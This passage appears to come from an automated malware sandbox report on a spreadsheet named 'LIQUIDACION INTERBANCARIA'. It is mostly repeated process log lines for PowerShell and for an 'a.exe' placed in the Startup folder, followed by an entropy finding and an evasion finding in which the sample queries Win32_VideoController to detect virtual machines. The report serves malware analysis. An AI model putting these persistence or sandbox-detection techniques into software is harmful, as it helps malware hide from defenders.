                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsStream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
